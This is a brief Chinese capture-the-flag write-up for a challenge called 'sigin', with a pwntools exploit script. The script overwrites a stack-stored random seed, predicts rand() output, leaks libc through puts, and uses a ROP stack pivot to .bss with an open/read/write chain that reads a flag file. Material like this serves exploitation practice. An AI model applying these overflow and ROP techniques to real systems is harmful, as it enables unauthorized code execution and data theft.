qwnt2024

sigin

开了随机种子，输入要和随机数一样

由于buf和seed在栈上，所以可以利用输入buf把seed给覆盖掉

使用 libc=cdll.LoadLibrary(“./libc.so.6”) ，加载的就是特定的libc，然后利用libc的函数libc.srand(seed),得到的随机数和rand一样，后续就是用老套的orw就能解决，不过要栈迁移取去bss段上执行，因为在栈上的rop长度不够

from pwn import*
from ctypes import *
from LibcSearcher import *
#p=remote("node4.buuoj.cn",)
p=process("./vuln")
context.log_level="debug"
elf=ELF('./vuln')
context(arch='amd64')
#libc=ELF('/home/hpp/s/buu/how2heap/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')


libc=cdll.LoadLibrary("./libc.so.6") 
#
def dbg():
	gdb.attach(p)
	pause()

p.send(b'a'*14+p32(1))
libc.srand(1)
menu=0x4014E6
for i in range(100):
	k=libc.rand()%100+1
	print(k)
	p.sendafter('code:',p8(k))

pop_rdi=0x401893
p.sendafter('>>',p32(1))
p.sendlineafter('Index: ',p32(0))
payload=b'a'*0x108+p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(menu)
libc=ELF('/home/hpp/s/buu/how2heap/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')
p.sendlineafter('Note: ',payload)
puts=u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
base=puts-libc.sym['puts']
pop_rsi=0x202f8+base
pop_rdx=0x1b92+base
read=base+libc.sym['read']
op=base+libc.sym['open']
write=base+libc.sym['write']
bss=0x4040A0

leave=0x401591

p.sendafter('Index: ',p32(2))
print(hex(op))

payload=b'b'*0x108+p64(pop_rsi)+p64(bss)+p64(read)+p64(menu)
p.sendlineafter('Note: ','asdf')

p.sendline(payload)

p.sendline('./flag\x00')

p.sendlineafter('Index: ',p32(2))
payload=b'a'*0x108+p64(pop_rsi)+p64(bss+0x200)+p64(read)+p64(menu)

p.sendlineafter('Note: ',payload)

#orw

payload=p64(pop_rdi)+p64(bss)+p64(pop_rsi)+p64(0)+p64(op)
payload+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(bss+0x200)+p64(pop_rdx)+p64(0x40)+p64(read)
payload+=p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(bss+0x200)+p64(pop_rdx)+p64(0x40)+p64(write)
p.sendline(payload)
dbg()
p.sendlineafter('Index: ',p32(3))
payload=b'd'*0xff+p64(bss+0x200-8)+p64(leave)
p.sendafter('Note: ','g'*0x100)
p.sendline(payload)
print(hex(puts))
#leak_base
#p.sendline(payload)

p.interactive()